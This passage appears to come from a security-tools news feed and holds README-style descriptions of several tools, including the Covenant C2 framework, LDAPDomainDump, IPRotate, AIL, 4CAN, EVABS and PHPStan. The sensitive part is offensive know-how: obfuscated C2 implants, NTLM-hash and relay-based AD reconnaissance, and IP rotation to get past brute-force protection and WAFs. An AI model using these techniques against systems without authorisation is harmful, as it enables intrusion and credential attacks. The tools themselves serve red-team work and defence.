And many more, that do not fit here .. Thanks to all of them and their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net



Covenant - A .NET Command And Control Framework For Red Teamers

$
0
0

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.



Quick-Start Guide
Please see the Installation and Startup guide to get started with Covenant!
The Wiki documents most of Covenant's core features and how to use them.

Features
Covenant has several key features that make it useful and differentiate it from other command and control frameworks:
  • Intuitive Interface - Covenant provides an intuitive web application to easily run a collaborative red team operation.
  • Multi-Platform - Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
  • Multi-User - Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
  • API Driven - Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
  • Listener Profiles - Covenant supports listener“profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire.
  • Encrypted Key Exchange - Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
  • Dynamic Compilation - Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
  • Inline C# Execution - Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
  • Tracking Indicators - Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement.
  • Developed in C# - Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion
Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.


LDAPDomainDump - Active Directory Information Dumper Via LDAP

$
0
0

Active Directory information dumper via LDAP

Introduction
In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format.
ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.
The tool was designed with the following goals in mind:
  • Easy overview of all users/groups/computers/policies in the domain
  • Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1)
  • Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx
The tool outputs several files containing an overview of objects in the domain:
  • domain_groups: List of groups in the domain
  • domain_users: List of users in the domain
  • domain_computers: List of computer accounts in the domain
  • domain_policy: Domain policy such as password requirements and lockout policy
  • domain_trusts: Incoming and outgoing domain trusts, and their properties
As well as two grouped files:
  • domain_users_by_group: Domain users per group they are member of
  • domain_computers_by_os: Domain computers sorted by Operating System

Dependencies and installation
Requires ldap3> 2.0 and dnspython
Both can be installed with pip install ldap3 dnspython
The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump.

Usage
There are 3 ways to use the tool:
  • With just the source, run python ldapdomaindump.py
  • After installing, by running python -m ldapdomaindump
  • After installing, by running ldapdomaindump
Help can be obtained with the -h switch:
usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
[-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
[--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
[-m]
HOSTNAME

Domain information dumper via LDAP. Dumps users/computers/groups and
OS/membership information to HTML/JSON/greppable output.

Required options:
HOSTNAME Hostname/ip or ldap://host:port connection string to
connect to (use ldaps:// to use SSL)

Main options:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME
DOMAIN\username for authentication, leave empty for
anonymous authentication
-p PASSWORD, --password PASSWORD
Password or LM:NTLM hash, will prompt if not specified
-at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE}
Authentication type (NTLM or SIMPLE, default: NTLM)

Output options:
-o DIRECTORY, --outdir DIRECTORY
Directory in which the dump will be saved (default:
current)
--no-html Disable HTML output
--no-json Disable JSON output
--no-grep Disable Greppable output
--grouped-json Also write json files for grouped files (default:
disabled)
-d DELIMITER, --delimiter DELIMITER
Field delimiter for greppable output (default: tab)

Misc options:
-r, --resolve Resolve computer hostnames (might take a while and
cause high traffic on large networks)
-n DNS_SERVER, --dns-server DNS_SERVER
Use custom DNS resolver instead of system DNS (t ry a
domain controller IP)
-m, --minimal Only query minimal set of attributes to limit memmory
usage

Options

Authentication
Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE.

Output formats
By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already.

DNS resolving
An important option is the -r option, which decides if a computers DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller.

Minimizing network and memory usage
By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch.

Visualizing groups with BloodHound
LDAPDomainDump includes a utility that can be used to convert ldapdomaindumps .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json file and convert those to group_membership.csv and trust.csv which you can add to BloodHound.


IPRotate - Extension For Burp Suite Which Uses AWS API Gateway To Rotate Your IP On Every Request

$
0
0

Extension for Burp Suite which uses AWS API Gateway to change your IP on every request.
More info: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/

Description
This extension allows you to easily spin up API Gateways across multiple regions. All the Burp Suite traffic for the targeted host is then routed through the API Gateway endpoints which causes the IP to be different on each request. (There is a chance for recycling of IPs but this is pretty low and the more regions you use the less of a chance.)
This is useful to bypass different kinds of IP blocking like bruteforceprotection that blocks based on IP, API rate limiting based on IP or WAF blocking based on IP etc.

Usage
  1. Setup Jython in Burp Suite
  2. Install the boto3 module for Python 2
    pip install boto3
  3. Ensure you have a set of AWS keys that have full access to the API Gateway service. This is available through the free tier of AWS.
  4. Insert the credentials into the fields.
  5. Insert the target domain you wish to target.
  6. Select HTTPS if the domain is hosted over HTTPS.
  7. Select all the regions you want to use.(The more you use the larger the IP pool will be)
  8. Click "Enable".
  9. Once you are done ensure you click disable to delete all the resources which were started.
If you want to check on the resources and enpoints that were started or any potential errors you can look at the output console in Burp.

The Burp UI


Example of how the requests look


Setup
Make sure you have Jython installed and add IPRotate.py through the Burp Extension options.


Previous Research
After releasing this extension it was pointed out that there has been other research in this area using AWS API Gateway to hide an IP address. There is some awesome research and tools by @ustayready@ryHanson and @rmikehodges using this technique.
Be sure to check them out too:
https://github.com/ustayready/fireprox
https://github.com/rmikehodges/hideNsneak


Sublert - Security And Reconnaissance Tool Which Leverages Certificate Transparency To Automatically Monitor New Subdomains Deployed By Specific Organizations And Issued TLS/SSL Certificate

$
0
0

Sublert is a security and reconnaissance tool that was written in Python to leverage certificate transparency for the sole purpose of monitoring new subdomains deployed by specific organizations and issued TLS/SSL certificate. The tool is supposed to be scheduled to run periodically at fixed times, dates, or intervals (Ideally each day). New identified subdomains will be sent to Slack workspace with a notification push. Furthermore, the tool performs DNS resolution to determine working subdomains.

Requirements
  • Virtual Private Server (VPS) running on Unix. (I personally use digitalOcean)
  • Python 2.x or 3.x.
  • Free Slack workspace.

Installation & Configuration
Please refer to below article for a detailed technical explanation:

Usage
Short FormLong FormDescription
-u--urlAdds a domain to monitor. E.g: yahoo.com.
-d--deleteDomain to remove from the monitored list. E.g: yahoo.com.
-a--listListing all monitored domains.
-t--threadsNumber of concurrent threads to use (Default: 20).
-r--resolvePerform DNS resolution.
-l--loggingEnable Slack-based error logging.
-m--resetReset everything.

Feedback and issues?
If you have any feedback, anything that you want to see implemented or running into issues using Sublert, please feel free to file an issue on https://github.com/yassineaboukir/sublert/issues


Airgeddon v9.21 - A Multi-use Bash Script for Linux Systems to Audit Wireless Networ

$
0
0

AIL Framework - Framework for Analysis of Information Leaks

$
0
0

AIL is a modular framework to analyse potential information leaks from unstructured data sources like pastes from Pastebin or similar services or unstructured data streams. AIL framework is flexible and can be extended to support other functionalities to mine or process sensitive information (e.g. data leak prevention).



Features
  • Modular architecture to handle streams of unstructured or structured information
  • Default support for external ZMQ feeds, such as provided by CIRCL or other providers
  • Multiple feed support
  • Each module can process and reprocess the information already processed by AIL
  • Detecting and extracting URLs including their geographical location (e.g. IP address location)
  • Extracting and validating potential leak of credit cards numbers, credentials, ...
  • Extracting and validating email addresses leaked including DNS MX validation
  • Module for extracting Tor .onion addresses (to be further processed for analysis)
  • Keep tracks of duplicates (and diffing between each duplicate found)
  • Extracting and validating potential hostnames (e.g. to feed Passive DNS systems)
  • A full-text indexer module to index unstructured information
  • Statistics on modules and web
  • Real-time modules manager in terminal
  • Global sentiment analysis for each providers based on nltk vader module
  • Terms, Set of terms and Regex tracking and occurrence
  • Many more modules for extracting phone numbers, credentials and others
  • Alerting to MISP to share found leaks within a threat intelligence platform using MISP standard
  • Detect and decode encoded file (Base64, hex encoded or your own decoding scheme) and store files
  • Detect Amazon AWS and Google API keys
  • Detect Bitcoin address and Bitcoin private keys
  • Detect private keys, certificate, keys (including SSH, OpenVPN)
  • Detect IBAN bank accounts
  • Tagging system with MISP Galaxy and MISP Taxonomies tags
  • UI paste submission
  • Create events on MISP and cases on The Hive
  • Automatic paste export at detection on MISP (events) and The Hive (alerts) on selected tags
  • Extracted and decoded files can be searched by date range, type of file (mime-type) and encoding discovered
  • Graph relationships between decoded file (hashes), similar PGP UIDs and addresses of cryptocurrencies
  • Tor hidden services crawler to crawl and parse output
  • Tor onion availability is monitored to detect up and down of hidden services
  • Browser hidden services are screenshot and integrated in the analysed output including a blurring screenshot interface (to avoid "burning the eyes" of the security analysis with specific content)
  • Tor hidden services is part of the standard framework, all the AIL modules are available to the crawled hidden services
  • Generic web crawler to trigger crawling on demand or at regular interval URL or Tor hidden services

Installation
Type these command lines for a fully automated installation and start AIL framework:
git clone https://github.com/CIRCL/AIL-framework.git
cd AIL-framework
./installing_deps.sh

cd ~/AIL-framework/
cd bin/
./LAUNCH.sh -l
The default installing_deps.sh is for Debian and Ubuntu based distributions.
There is also a Travis file used for automating the installation that can be used to build and install AIL on other systems.
Requirement:
  • Python 3.5+

Installation Notes
In order to use AIL combined with ZFS or unprivileged LXC it's necessary to disable Direct I/O in $AIL_HOME/configs/6382.conf by changing the value of the directive use_direct_io_for_flush_and_compaction to false.

Starting AIL
cd bin/
./LAUNCH -l
Eventually you can browse the status of the AIL framework website at the following URL:
https://localhost:7000/
The default credentials for the web interface are located in DEFAULT_PASSWORD. This file is removed when you change your password.

Training
CIRCL organises training on how to use or extend the AIL framework. AIL training materials are available at https://www.circl.lu/services/ail-training-materials/.

HOWTO
HOWTO are available in HOWTO.md

Privacy and GDPR
AIL information leaks analysis and the GDPR in the context of collection, analysis and sharing information leaks document provides an overview how to use AIL in a lawfulness context especially in the scope of General Data Protection Regulation.

Research using AIL
If you write academic paper, relying or using AIL, it can be cited with the following BibTeX:
@inproceedings{mokaddem2018ail,
title={AIL-The design and implementation of an Analysis Information Leak framework},
author={Mokaddem, Sami and Wagener, G{\'e}rard and Dulaunoy, Alexandre},
booktitle={2018 IEEE International Conference on Big Data (Big Data)},
pages={5049--5057},
year={2018},
organization={IEEE}
}

Screenshots

Tor hidden service crawler


Trending charts



Extracted encoded files from pastes



Browsing


Tagging system


MISP and The Hive, automatic events and alerts creation


Paste submission


Sentiment analysis


Terms manager and occurrence


Top terms



AIL framework screencast

Command line module manager



4CAN - Open Source Security Tool to Find Security Vulnerabilities in Modern Cars

$
0
0

Open Source Security Tool to Find Security Vulnerabilities in Modern Cars.

hardware
Tested on the following raspbian images using a pi3b+
4can should also work with a pi0w, but it's recommended to use at least a pi3b. Also recommend using a heatsink on the pi, because the pi can get a little toasty running 4 can interfaces.

install
run the install.sh script (requires sudo) to automatically install everything, and then reboot.
The install script will do the following:
  1. Copy the 4 mcp2515-canx.dtbo files to /boot/overlays
sudo mkdir /boot/overlays/bak
sudo cp /boot/overlays/mcp2515* /boot/overlays/bak
sudo cp ./dtbo/*.dtbo /boot/overlays
  1. copy config.txt to /boot/config.txt (make a backup of original /boot/config.txt just incase)
sudo cp /boot/config.txt /boot/config.txt.bak
sudo cp config.txt /boot/config.txt

usage
Before using 4can, make sure that the socketcan kernel module is loaded with sudo modprobe can_dev. This shouldn't be necessary since the pi will load the correct kernel module based on the device tree, but it doesn't hurt to check.
Once installed, run the 4can.sh to bring up CAN interfaces ./4can.sh
wire up the can interfaces and do candump -acc any to check they are working. note: requires can-utils to install sudo apt install can-utils
Note: Sometimes interfaces come up out of order, reboot the pi and that should fix it. If not, you might have to modify /boot/config.txt.

GPIO
The 4can uses a number of GPIO on the raspberry pi. The GPIO pins available for use are 3, 5, 8, 10, 27, 28, 32, 36 (physical pin numbering)
All the ground pins are tied together and can should be used as ground connections. The 3.3v, and 5v pins can be used to supply voltage as well.
Consult the schematic for more details.

Recommended Wiring
Remember to connect the external CAN ground to the 4can ground (the "C" connection on the screw terminal). This will ensure good ground integrity and minimize tx/rx errors.



For even more aesthetics, the resistor color code can be used to assign colors to signals. For example, in the image above:When using the 4can with the HyenaPlate, the CAN wires can be routed underneath the pi and connected to the breadboard. This is mainly for aesthetics, but other benefits include not having to constantly screw/unscrew the screw terminals to make new connections, easier troubleshooting, and more stable connections.
interfaceCAN-LCAN-H
CAN0brownred
CAN1orangeyellow
CAN2blueviolet
CAN3greenwhite
black can be used for ground.

Credit and License

IndustrialBerry
The 4can was inspired by and is loosely based on the IndustrialBerry QUAD CAN BUS adapter for Raspberry CanBerry. Although we modified the design to suit our needs, we must give credit to the fantastic work done by IndustrialBerry. The 4CAN, as well as the IndustrialBerry are licensed under a Creative Commons Attribution Share-Alike license.

George Tarnovsky
Credit must also be given to George Tarnovsky, for schematic, layout, assembly, and verification!



EVABS - Extremely Vulnerable Android Labs

$
0
0

An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new concept. This project is still under progress and aims at incorporating as many levels as possible.
For complete details and solutions, head to the wiki.

INSTALLATION
  • Download the application file (apk).
  • Install it in an Android device (rooted recommended) or emulator.

SCREENSHOTS:


REQUIREMENTS
or use ADHRIT (all-in-one tool)
Confused? Read the documentation on setting up the environment.

CHANGE LOG
  • Flag checking module added within EVABS.
  • Alternatively, you can use this link to submit flags from your browser.
  • UI improvements

BUILDING LOCALLY
  • Clone the repository git clone https://github.com/abhi-r3v0/EVABS.git or download the zip.
  • Create a new folder EVABS in your ``AndroidStudioProjects``` directory and move the contents to the new directory.
  • Fire up Android Studio, File -> open and select the project.
  • Go to Build -> Generate Signed APK.
  • Create a new signature, if it doesn't exist. Sign the APK.
  • Install the APK using adb install EVABS.apk

THE SQUAD

PROJECT LEAD:

LOGO

PHPStan - PHP Static Analysis Tool (Discover Bugs In Your Code Without Running It!)

$
0
0

PHPStan focuses on finding errors in your code without actually running it. It catches whole classes of bugs even before you write tests for the code. It moves PHP closer to compiled languages in the sense that the correctness of each line of the code can be checked before you run the actual line.

Read more about PHPStan on Medium.com
Try out PHPStan on the on-line playground!

Prerequisites
PHPStan requires PHP >= 7.1. You have to run it in environment with PHP 7.x but the actual code does not have to use PHP 7.x features. (Code written for PHP 5.6 and earlier can run on 7.x mostly unmodified.)
PHPStan works best with modern object-oriented code. The more strongly-typed your code is, the more information you give PHPStan to work with.
Properly annotated and typehinted code (class properties, function and method arguments, return types) helps not only static analysis tools but also other people that work with the code to understand it.

Installation
To start performing analysis on your code, require PHPStan in Composer:
composer require --dev phpstan/phpstan
Composer will install PHPStan's executable in its bin-dir which defaults to vendor/bin.
If you have conflicting dependencies or you want to install PHPStan globally, the best way is via a PHAR archive. You will always find the latest stable PHAR archive below the release notes. You can also use the phpstan/phpstan-shim package to install PHPStan via Composer without the risk of conflicting dependencies.
You can also use PHPStan via Docker.

First run
To let PHPStan analyse your codebase, you have to use the analyse command and point it to the right directories.
So, for example if you have your classes in directories src and tests, you can run PHPStan like this:
vendor/bin/phpstan analyse src tests
PHPStan will probably find some errors, but don't worry, your code might be just fine. Errors found on the first run tend to be:
  • Extra arguments passed to functions (e. g. function requires two arguments, the code passes three)
  • Extra arguments passed to print/sprintf functions (e. g. format string contains one placeholder, the code passes two values to replace)
  • Obvious errors in dead code
  • Magic behaviour that needs to be defined. See Extensibility.
After fixing the obvious mistakes in the code, look to the following section for all the configuration options that will bring the number of reported errors to zero making PHPStan suitable to run as part of your continuous integration script.

Rule levels
If you want to use PHPStan but your codebase isn't up to speed with strong typing and PHPStan's strict checks, you can choose from currently 8 levels (0 is the loosest and 7 is the strictest) by passing --level to analyse command. Default level is 0.
This feature enables incremental adoption of PHPStan checks. You can start using PHPStan with a lower rule level and increase it when you feel like it.
You can also use --level max as an alias for the highest level. This will ensure that you will always use the highest level when upgrading to new versions of PHPStan. Please note that this can create a significant obstacle when upgrading to a newer version because you might have to fix a lot of code to bring the number of errors down to zero.

Extensibility
Unique feature of PHPStan is the ability to define and statically check "magic" behaviour of classes - accessing properties that are not defined in the class but are created in __get and __set and invoking methods using __call.
See Class reflection extensions, Dynamic return type extensions and Type-specifying extensions.
You can also install official framework-specific extensions:
Unofficial extensions for other frameworks and libraries are also available:
Unofficial extensions with third-party rules:
New extensions are becoming available on a regular basis!

Configuration
Config file is passed to the phpstan executable with -c option:
vendor/bin/phpstan analyse -l 4 -c phpstan.neon src tests
When using a custom project config file, you have to pass the --level (-l) option to analyse command (default value does not apply here).
If you do not provide config file explicitly, PHPStan will look for files named phpstan.neon or phpstan.neon.dist in current directory.
The resolution priority is as such:
  1. If config file is provided on command line, it is used.
  2. If config file phpstan.neon exists in current directory, it will be used.
  3. If config file phpstan.neon.dist exists in current directory, it will be used.
  4. If none of the above is true, no config will be used.
NEON file format is very similar to YAML. All the following options are part of the parameters section.

Configuration variables
  • %rootDir% - root directory where PHPStan resides (i.e. vendor/phpstan/phpstan in Composer installation)
  • %currentWorkingDirectory% - current working directory where PHPStan was executed

Configuration options
  • tmpDir - specifies the temporary directory used by PHPStan cache (defaults to sys_get_temp_dir() . '/phpstan')
  • level - specifies analysis level - if specified, -l option is not required
  • paths - specifies analysed paths - if specified, paths are not required to be passed as arguments

Autoloading
PHPStan uses Composer autoloader so the easiest way how to autoload classes is through the autoload/autoload-dev sections in composer.json.

Specify paths to scan
If PHPStan complains about some non-existent classes and you're sure the classes exist in the codebase AND you don't want to use Composer autoloader for some reason, you can specify directories to scan and concrete files to include using autoload_directories and autoload_files array parameters:
parameters:
autoload_directories:
- %rootDir%/../../../build
autoload_files:
- %rootDir%/../../../generated/routes/GeneratedRouteList.php
%rootDir% is expanded to the root directory where PHPStan resides.

Autoloading for global installation
PHPStan supports global installation using composer global or via a PHAR archive. In this case, it's not part of the project autoloader, but it supports autodiscovery of the Composer autoloader from current working directory residing in vendor/:
cd /path/to/project
phpstan analyse src tests # looks for autoloader at /path/to/project/vendor/autoload.php
If you have your dependencies installed at a different path or you're running PHPStan from a different directory, you can specify the path to the autoloader with the --autoload-file|-a option:
phpstan analyse --autoload-file=/path/to/autoload.php src tests

Exclude files from analysis
If your codebase contains some files that are broken on purpose (e. g. to test behaviour of your application on files with invalid PHP code), you can exclude them using the excludes_analyse array parameter. String at each line is used as a pattern for the fnmatch function.
parameters:
excludes_analyse:
- %rootDir%/../../../tests/*/data/*

Include custom extensions
If your codebase contains php files with extensions other than the standard .php extension then you can add them to the fileExtensions array parameter:
parameters:
fileExtensions:
- php
- module
- inc

Universal object crates
Classes without predefined structure are common in PHP applications. They are used as universal holders of data - any property can be set and read on them. Notable examples include stdClass, SimpleXMLElement (these are enabled by default), objects with results of database queries etc. Use universalObjectCratesClasses array parameter to let PHPStan know which classes with these characteristics are used in your codebase:
parameters:
universalObjectCratesClasses:
- Dibi\Row
- Ratchet\ConnectionInterface

Add non-obviously assigned variables to scope
If you use some variables from a try block in your catch blocks, set polluteCatchScopeWithTryAssignments boolean parameter to true.
try {
$author = $this->getLoggedInUser();
$post = $this->postRepository->getById($id);
} catch (PostNotFoundException $e) {
// $author is probably defined here
throw new ArticleByAuthorCannotBePublished($author);
}
If you are enumerating over all possible situations in if-elseif branches and PHPStan complains about undefined variables after the conditions, you can write an else branch with throwing an exception:
if (somethingIsTrue()) {
$foo = true;
} elseif (orSomethingElseIsTrue()) {
$foo = false;
} else {
throw new ShouldNotHappenException();
}

doFoo($foo);
I recommend leaving polluteCatchScopeWithTryAssignments set to false because it leads to a clearer and more maintainable code.

Custom early terminating method calls
Previous example showed that if a condition branches end with throwing an exception, that branch does not have to define a variable used after the condition branches end.
But exceptions are not the only way how to terminate execution of a method early. Some specific method calls can be perceived by project developers also as early terminating - like a redirect() that stops execution by throwing an internal exception.
if (somethingIsTrue()) {
$foo = true;
} elseif (orSomethingElseIsTrue()) {
$foo = false;
} else {
$this->redirect('homepage');
}

doFoo($foo);
These methods can be configured by specifying a class on whose instance they are called like this:
parameters:
earlyTerminatingMethodCalls:
Nette\Application\UI\Presenter:
- redirect
- redirectUrl
- sendJson
- sendResponse

Ignore error messages with regular expressions
If some issue in your code base is not easy to fix or just simply want to deal with it later, you can exclude error messages from the analysis result with regular expressions:
parameters:
ignoreErrors:
- '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
- '#Call to an undefined method [a-zA-Z0-9\\_]+::expects\(\)#'
- '#Access to an undefined property PHPUnit_Framework_MockObject_MockObject::\$[a-zA-Z0-9_]+#'
- '#Call to an undefined method PHPUnit_Framework_MockObject_MockObject::[a-zA-Z0-9_]+\(\)#'
To exclude an error in a specific directory or file, specify a path or paths along with the message:
parameters:
ignoreErrors:
-
message: '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
path: %currentWorkingDirectory%/some/dir/SomeFile.php
-
message: '#Call to an undefined method [a-zA-Z0-9\\_]+::method\(\)#'
paths:
- %currentWorkingDirectory%/some/dir/*
- %currentWorkingDirectory%/other/dir/*
- '#Other error to catch anywhere#'
If some of the patterns do not occur in the result anymore, PHPStan will let you know and you will have to remove the pattern from the configuration. You can turn off this behaviour by setting reportUnmatchedIgnoredErrors to false in PHPStan configuration.

Bootstrap file
If you need to initialize something in PHP runtime before PHPStan runs (like your own autoloader), you can provide your own bootstrap file:
parameters:
bootstrap: %rootDir%/../../../phpstan-bootstrap.php

Custom rules
PHPStan allows writing custom rules to check for specific situations in your own codebase. Your rule class needs to implement the PHPStan\Rules\Rule interface and registered as a service in the configuration file:
services:
-
class: MyApp\PHPStan\Rules\DefaultValueTypesAssignedToPropertiesRule
tags:
- phpstan.rules.rule
For inspiration on how to implement a rule turn to src/Rules to see a lot of built-in rules.
Check out also phpstan-strict-rules repository for extra strict and opinionated rules for PHPStan!
Check as well phpstan-deprecation-rules for rules that detect usage of deprecated classes, methods, properties, constants and traits!

Custom error formatters
PHPStan outputs errors via formatters. You can customize the output by implementing the ErrorFormatter interface in a new class and add it to the configuration. For existing formatters, see next chapter.
interface ErrorFormatter
{

/**
* Formats the errors and outputs them to the console.
*
* @param \PHPStan\Command\AnalysisResult $analysisResult
* @param \Symfony\Component\Console\Style\OutputStyle $style
* @return int Error code.
*/
public function formatErrors(
AnalysisResult $analysisResult,
\Symfony\Component\Console\Style\OutputStyle $style
): int;

}
Register the formatter in your phpstan.neon:
services:
errorFormatter.awesome:
class: App\PHPStan\AwesomeErrorFormatter
Use the name part after errorFormatter. as the CLI option value:
vendor/bin/phpstan analyse -c phpstan.neon -l 4 --error-format awesome src tests

Existing error formatters to be used
You can pass the following keywords to the --error-format=X parameter in order to affect the output:
  • table: Default. Grouped errors by file, colorized. For human consumption.
  • raw: Contains one error per line, with path to file, line number, and error description
  • checkstyle: Creates a checkstyle.xml compatible output. Note that you'd have to redirect output into a file in order to capture the results for later processing.
  • json: Creates minified .json output without whitespaces. Note that you'd have to redirect output into a file in order to capture the results for later processing.
  • prettyJson: Creates human readable .json output with whitespaces and indentations. Note that you'd have to redirect output into a file in order to capture the results for later processing.

Class reflection extensions
Classes in PHP can expose "magical" properties and methods decided in run-time using class methods like __get, __set and __call. Because PHPStan is all about static analysis (testing code for errors without running it), it has to know about those properties and methods beforehand.
When PHPStan stumbles upon a property or a method that is unknown to built-in class reflection, it iterates over all registered class reflection extensions until it finds one that defines the property or method.
Class reflection extension cannot have PHPStan\Broker\Broker (service for obtaining class reflections) injected in the constructor due to circular reference issue, but the extensions can implement PHPStan\Reflection\BrokerAwareExtension interface to obtain Broker via a setter.

Properties class reflection extensions
This extension type must implement the following interface:
namespace PHPStan\Reflection;

interface PropertiesClassReflectionExtension
{

public function hasProperty(ClassReflection $classReflection, string $propertyName): bool;

public function getProperty(ClassReflection $classReflection, string $propertyName): PropertyReflection;

}
Most likely you will also have to implement a new PropertyReflection class:
namespace PHPStan\Reflection;

interface PropertyReflection
{

public function getType(): Type;

public function getDeclaringClass(): ClassReflection;

public function isStatic(): bool;

public function isPrivate(): bool;

public function isPublic(): bool;

}
This is how you register the extension in project's PHPStan config file:
services:
-
class: App\PHPStan\PropertiesFromAnnotationsClassReflectionExtension
tags:
- phpstan.broker.propertiesClassReflectionExtension

Methods class reflection extensions
This extension type must implement the following interface:
namespace PHPStan\Reflection;

interface MethodsClassReflectionExtension
{

public function hasMethod(ClassReflection $classReflection, string $methodName): bool;

public function getMethod(ClassReflection $classReflection, string $methodName): MethodReflection;

}
Most likely you will also have to implement a new MethodReflection class:
namespace PHPStan\Reflection;

interface MethodReflection
{

public function getDeclaringClass(): ClassReflection;

public function getPrototype(): self;

public function isStatic(): bool;

public function isPrivate(): bool;

public function isPublic(): bool;

public function getName(): string;

/**
* @return \PHPStan\Reflection\ParameterReflection[]
*/
public function getParameters(): array;

public function isVariadic(): bool;

public function getReturnType(): Type;

}
This is how you register the extension in project's PHPStan config file:
services:
-
class: App\PHPStan\EnumMethodsClassReflectionExtension
tags:
- phpstan.broker.methodsClassReflectionExtension

Dynamic return type extensions
If the return type of a method is not always the same, but depends on an argument passed to the method, you can specify the return type by writing and registering an extension.
Because you have to write the code with the type-resolving logic, it can be as complex as you want.
After writing the sample extension, the variable $mergedArticle will have the correct type:
$mergedArticle = $this->entityManager->merge($article);
// $mergedArticle will have the same type as $article
This is the interface for dynamic return type extension:
namespace PHPStan\Type;

use PhpParser\Node\Expr\MethodCall;
use PHPStan\Analyser\Scope;
use PHPStan\Reflection\MethodReflection;

interface DynamicMethodReturnTypeExtension
{

public function getClass(): string;

public function isMethodSupported(MethodReflection $methodReflection): bool;

public function getTypeFromMethodCall(MethodReflection $methodReflection, MethodCall $methodCall, Scope $scope): Type;

}
And this is how you'd write the extension that correctly resolves the EntityManager::merge() return type:
public function getClass(): string
{
return \Doctrine\ORM\EntityManager::class;
}

public function isMethodSupported(MethodReflection $methodReflection): bool
{
return $methodReflection->getName() === 'merge';
}

public function getTypeFromMethodCall(MethodReflection $methodReflection, MethodCall $methodCall, Scope $scope): Type
{
if (count($methodCall->args) === 0) {
return \PHPStan\Reflection\ParametersAcceptorSelector::selectFromArgs(
$scope,
$methodCall->args,
$methodReflection->getVariants()
)->getReturnType();
}
$arg = $methodCall->args[0]->value;

return $scope->getType($arg);
}
And finally, register the extension to PHPStan in the project's config file:
services:
-
class: App\PHPStan\EntityManagerDynamicReturnTypeExtension
tags:
- phpstan.broker.dynamicMethodReturnTypeExtension
There's also an analogous functionality for:
  • static methods using DynamicStaticMethodReturnTypeExtension interface and phpstan.broker.dynamicStaticMethodReturnTypeExtension service tag.
  • functions using DynamicFunctionReturnTypeExtension interface and phpstan.broker.dynamicFunctionReturnTypeExtension service tag.

Type-specifying extensions
These extensions allow you to specify types of expressions based on certain pre-existing conditions. This is best illustrated with couple examples:
if (is_int($variable)) {
// here we can be sure that $variable is integer
}
// using PHPUnit's asserts

self::assertNotNull($variable);
// here we can be sure that $variable is not null
Type-specifying extension cannot have PHPStan\Analyser\TypeSpecifier injected in the constructor due to circular reference issue, but the extensions can implement PHPStan\Analyser\TypeSpecifierAwareExtension interface to obtain TypeSpecifier via a setter.
This is the interface for type-specifying extension:
namespace PHPStan\Type;

use PhpParser\Node\Expr\StaticCall;
